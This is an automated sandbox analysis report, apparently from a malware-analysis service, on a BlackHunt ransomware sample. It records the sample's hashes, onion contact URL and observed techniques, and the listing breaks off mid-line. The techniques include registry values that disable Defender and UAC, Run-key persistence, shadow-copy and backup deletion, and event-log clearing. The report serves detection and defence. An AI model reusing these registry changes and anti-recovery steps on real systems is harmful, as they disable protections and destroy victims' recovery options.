Analysis
-
max time kernel
152s -
max time network
161s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19/01/2024, 00:41
Static task
static1
Behavioral task
behavioral1
Sample
ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe
Resource
win10v2004-20231222-en
General
-
Target
ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe
-
Size
707KB
-
MD5
ae6b8f7bf28132447284f9e2b78278a5
-
SHA1
c26cc4c9f05ab7dc0073701c8eba5b7b873667b2
-
SHA256
ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982
-
SHA512
3f988594d422eeef5b2a00b637c894e8fc4b51ade5eaa7c74c42ed385f83536f156d2d1ca002d83697017f0ccf79725b3f4bda2332e1bc62fe71cfd3cbe76996
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza188Tvnh:6uaTmkZJ+naie5OTamgEoKxLWHTh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1696 fsutil.exe 2108 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 2624 wevtutil.exe 836 wevtutil.exe 1568 wevtutil.exe 2164 wevtutil.exe 2532 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2188 bcdedit.exe 2872 bcdedit.exe 2504 bcdedit.exe 2944 bcdedit.exe -
Renames multiple (2863) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2976 wbadmin.exe 2496 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe -
Enumerates connected drives 3 TTPs 26 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\T: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened (read-only) \??\N: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened (read-only) \??\M: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened (read-only) \??\U: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened (read-only) \??\P: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened (read-only) \??\O: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened (read-only) \??\J: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened (read-only) \??\B: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened (read-only) \??\R: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened (read-only) \??\Q: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened (read-only) \??\W: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened (read-only) \??\Y: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened (read-only) \??\I: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened (read-only) \??\A: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened (read-only) \??\S: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened (read-only) \??\H: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened (read-only) \??\K: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened (read-only) \??\Z: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened (read-only) \??\L: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened (read-only) \??\X: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened (read-only) \??\V: ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened (read-only) \??\F: fsutil.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1268429524-3929314613-1992311491-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\VideoLAN\VLC\plugins\d3d9\#BlackHunt_Private.key ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\7-Zip\Lang\fur.txt ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationLeft_ButtonGraphic.png ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.properties ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticattribute.exsd ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Enderbury ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_zh_CN.jar ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-views.jar ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-tools.jar ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\liveleak.luac ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\view.html ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File created C:\Program Files\VideoLAN\VLC\plugins\keystore\#BlackHunt_ReadMe.txt ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\#BlackHunt_ReadMe.txt ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\7-Zip\7-zip.chm ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.security ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kathmandu ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File created C:\Program Files\VideoLAN\VLC\locale\et\#BlackHunt_ReadMe.hta ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\#BlackHunt_ReadMe.txt ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\#BlackHunt_ReadMe.txt ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonInset_Alpha2.png ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin_2.0.100.v20131209-2144.jar ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-compat_ja.jar ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-5 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\#BlackHunt_ReadMe.hta ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Anchorage ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vienna ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-bootstrap.xml ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\#BlackHunt_ReadMe.txt ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File created C:\Program Files\Java\jre7\lib\management\#BlackHunt_Private.key ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\vlc.mo ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\#BlackHunt_ReadMe.hta ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File created C:\Program Files\VideoLAN\VLC\lua\#BlackHunt_ReadMe.hta ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File created C:\Program Files\VideoLAN\VLC\plugins\packetizer\#BlackHunt_Private.key ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Chatham ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File created C:\Program Files\Java\jdk1.7.0_80\#BlackHunt_ReadMe.hta ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Montreal ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\#BlackHunt_ReadMe.hta ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\#BlackHunt_ReadMe.hta ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\#BlackHunt_ReadMe.txt ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File created C:\Program Files\Java\jre7\bin\server\#BlackHunt_ReadMe.txt ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-enumerations.xml ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\#BlackHunt_Private.key ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File created C:\Program Files\DVD Maker\Shared\#BlackHunt_ReadMe.hta ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File created C:\Program Files\Java\jre7\lib\zi\America\Indiana\#BlackHunt_Private.key ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#BlackHunt_ReadMe.hta ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_videoinset.png ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Rothera ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\#BlackHunt_ReadMe.hta ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\#BlackHunt_ReadMe.hta ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground_PAL.wmv ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToScenesBackground_PAL.wmv ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Oslo ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-awt.jar ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File created C:\Program Files (x86)\#BlackHunt_Private.key ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_out\#BlackHunt_ReadMe.hta ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Dawson_Creek ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dubai ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1700 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2040 vssadmin.exe 1980 vssadmin.exe 1036 vssadmin.exe 2120 vssadmin.exe 1884 vssadmin.exe 2188 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 3092 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon bcdedit.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" bcdedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon bcdedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 bcdedit.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3316 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 3276 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe Token: SeRestorePrivilege 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe Token: SeBackupPrivilege 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe Token: SeTakeOwnershipPrivilege 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe Token: SeAuditPrivilege 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe Token: SeSecurityPrivilege 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe Token: SeIncBasePriorityPrivilege 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe Token: SeBackupPrivilege 2836 vssvc.exe Token: SeRestorePrivilege 2836 vssvc.exe Token: SeAuditPrivilege 2836 vssvc.exe Token: SeBackupPrivilege 2208 wbengine.exe Token: SeRestorePrivilege 2208 wbengine.exe Token: SeSecurityPrivilege 2208 wbengine.exe Token: SeSecurityPrivilege 2164 wevtutil.exe Token: SeBackupPrivilege 2164 wevtutil.exe Token: SeSecurityPrivilege 2532 wevtutil.exe Token: SeBackupPrivilege 2532 wevtutil.exe Token: SeSecurityPrivilege 2624 wevtutil.exe Token: SeBackupPrivilege 2624 wevtutil.exe Token: SeSecurityPrivilege 836 wevtutil.exe Token: SeBackupPrivilege 836 wevtutil.exe Token: SeSecurityPrivilege 1568 wevtutil.exe Token: SeBackupPrivilege 1568 wevtutil.exe Token: SeDebugPrivilege 3092 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1360 wrote to memory of 2688 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 29 PID 1360 wrote to memory of 2688 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 29 PID 1360 wrote to memory of 2688 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 29 PID 1360 wrote to memory of 2688 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 29 PID 1360 wrote to memory of 1508 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 152 PID 1360 wrote to memory of 1508 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 152 PID 1360 wrote to memory of 1508 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 152 PID 1360 wrote to memory of 1508 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 152 PID 1360 wrote to memory of 2852 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 30 PID 1360 wrote to memory of 2852 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 30 PID 1360 wrote to memory of 2852 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 30 PID 1360 wrote to memory of 2852 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 30 PID 1360 wrote to memory of 2988 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 150 PID 1360 wrote to memory of 2988 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 150 PID 1360 wrote to memory of 2988 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 150 PID 1360 wrote to memory of 2988 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 150 PID 1360 wrote to memory of 2756 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 33 PID 1360 wrote to memory of 2756 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 33 PID 1360 wrote to memory of 2756 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 33 PID 1360 wrote to memory of 2756 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 33 PID 1508 wrote to memory of 2276 1508 cmd.exe 148 PID 1508 wrote to memory of 2276 1508 cmd.exe 148 PID 1508 wrote to memory of 2276 1508 cmd.exe 148 PID 2688 wrote to memory of 2676 2688 cmd.exe 35 PID 2688 wrote to memory of 2676 2688 cmd.exe 35 PID 2688 wrote to memory of 2676 2688 cmd.exe 35 PID 2988 wrote to memory of 2872 2988 cmd.exe 106 PID 2988 wrote to memory of 2872 2988 cmd.exe 106 PID 2988 wrote to memory of 2872 2988 cmd.exe 106 PID 2852 wrote to memory of 2596 2852 cmd.exe 36 PID 2852 wrote to memory of 2596 2852 cmd.exe 36 PID 2852 wrote to memory of 2596 2852 cmd.exe 36 PID 1360 wrote to memory of 3064 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 38 PID 1360 wrote to memory of 3064 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 38 PID 1360 wrote to memory of 3064 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 38 PID 1360 wrote to memory of 3064 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 38 PID 1360 wrote to memory of 2908 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 39 PID 1360 wrote to memory of 2908 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 39 PID 1360 wrote to memory of 2908 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 39 PID 1360 wrote to memory of 2908 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 39 PID 1360 wrote to memory of 2560 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 40 PID 1360 wrote to memory of 2560 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 40 PID 1360 wrote to memory of 2560 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 40 PID 1360 wrote to memory of 2560 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 40 PID 1360 wrote to memory of 2572 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 42 PID 1360 wrote to memory of 2572 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 42 PID 1360 wrote to memory of 2572 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 42 PID 1360 wrote to memory of 2572 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 42 PID 2756 wrote to memory of 2608 2756 cmd.exe 146 PID 2756 wrote to memory of 2608 2756 cmd.exe 146 PID 2756 wrote to memory of 2608 2756 cmd.exe 146 PID 1360 wrote to memory of 2616 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 145 PID 1360 wrote to memory of 2616 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 145 PID 1360 wrote to memory of 2616 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 145 PID 1360 wrote to memory of 2616 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 145 PID 1360 wrote to memory of 2636 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 50 PID 1360 wrote to memory of 2636 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 50 PID 1360 wrote to memory of 2636 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 50 PID 1360 wrote to memory of 2636 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 50 PID 1360 wrote to memory of 2476 1360 ba0e773167a49b05cb6dcea1a64d9c34dba3e0a558dfeb607c619d0034a67982.exe 94 PID 1360 wrote to memory of 2476 1360 